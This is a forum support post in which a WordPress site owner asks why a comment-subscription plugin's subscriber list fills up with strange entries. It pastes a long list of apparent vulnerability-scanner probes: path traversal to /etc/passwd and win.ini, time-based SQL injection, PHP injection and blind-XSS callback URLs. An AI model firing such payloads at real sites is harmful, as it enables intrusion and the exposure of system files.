Bizarre list of subscribers
-
Hi all,
Thanks for the great plugin. I tried 5 of the top ranked comment subscription plugins and this was the only one that did not conflict with my theme!
I just installed the plugin and already on a couple of pages there are dozens of crazy entries in the list of subscribers. Hack attempts like injection attacks and penetration tests. They are pasted below.
Where do these values come from? Were they submitted as emails in the comments field? And why are they in this list if they were submitted before the plugin was installed and real email of commenters are not in this list? Should I remove them all?
Thanks
%2fetc%2fpasswd '" ';print(md5(acunetix_wvs_security_test));$a=' ";print(md5(acunetix_wvs_security_test));$a=" (select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0 ))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) -1" OR 2+141-141-1=0+0+0+1 -- -1" OR 3+141-141-1=0+0+0+1 -- ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.tst ................windowswin.ini ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd ../../../../../../../../../../../../../../../proc/version ../../../../../../../../../../etc/passwd ../../../../../../../../../../etc/passwd.tst ../../../../../../../../../../windows/win.ini ../../../../../../../../../../windows/win.ini.tst ../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd ../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini .\./.\./.\./.\./.\./.\./etc/passwd /../../../../../../../etc/passwd /../..//../..//../..//../..//../..//etc/passwd.tst /.././.././.././.././.././.././.././../etc/./passwd%00 /.\./.\./.\./.\./.\./.\./windows/win.ini /etc/passwd /WEB-INF/web.xml 1 waitfor delay '0:0:3' -- 1'" 164' 1GHlQH3a');select pg_sleep(6); -- 1some_inexistent_file_with_long_name.tst 7w8g5ZR5'; waitfor delay '0:0:6' -- ;print(md5(acunetix_wvs_security_test)); C:WINDOWSsystem32driversetchosts file:///etc/passwd https://hitmUVUdNdJvD.bxss.me/ https://some-inexistent-website.acu/some_inexistent_file_with_long_name?.tst if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()= index.php index.php/. invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././ JyI= m3GgSGL5'));select pg_sleep(6); -- ucEg9ldh';select pg_sleep(6); -- WEB-INF/web.xml WEB-INFweb.xml !(()&&!|*|*| %2fetc%2fpasswd '" ';print(md5(acunetix_wvs_security_test));$a=' ";print(md5(acunetix_wvs_security_test));$a=" (select(0)from(select(sleep(4)))v)/*'+(select(0)from(select(sleep(4)))v)+'"+(select(0 ) ))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) -1 OR 2+294-294-1=0+0+0+1 -1 OR 2+943-943-1=0+0+0+1 -- -1' OR 2+427-427-1=0+0+0+1 or 'X90KLkLc'=' -1' OR 2+735-735-1=0+0+0+1 -- -1" OR 2+608-608-1=0+0+0+1 -- ../../../../../../../../../../windows/win.ini ../../../../../../../../../../windows/win.ini.tst /.././.././.././.././.././.././.././../etc/./passwd%00 /WEB-INF/web.xml 1 waitfor delay '0:0:4' -- 1some_inexistent_file_with_long_name.tst 907' ;print(md5(acunetix_wvs_security_test)); A0HjJyy4';select pg_sleep(8); -- C:WINDOWSsystem32driversetchosts dJ4Thxyt'; waitfor delay '0:0:4' -- https://hit2AEhkeIVIS.bxss.me/ https://some-inexistent-website.acu/some_inexistent_file_with_long_name?.tst if(now()=sysdate(),sleep(4),0)/*'XOR(if(now()=sysdate(),sleep(4),0))OR'"XOR(if(now()= index.php index.php/. nCwJHPtS sample%40email.tst V5pZQ2J7'));select pg_sleep(8); -- WEB-INF/web.xml WEB-INFweb.xml xI5GNEWF');select pg_sleep(8); --
Viewing 1 replies (of 1 total)
Viewing 1 replies (of 1 total)
- The topic ‘Bizarre list of subscribers’ is closed to new replies.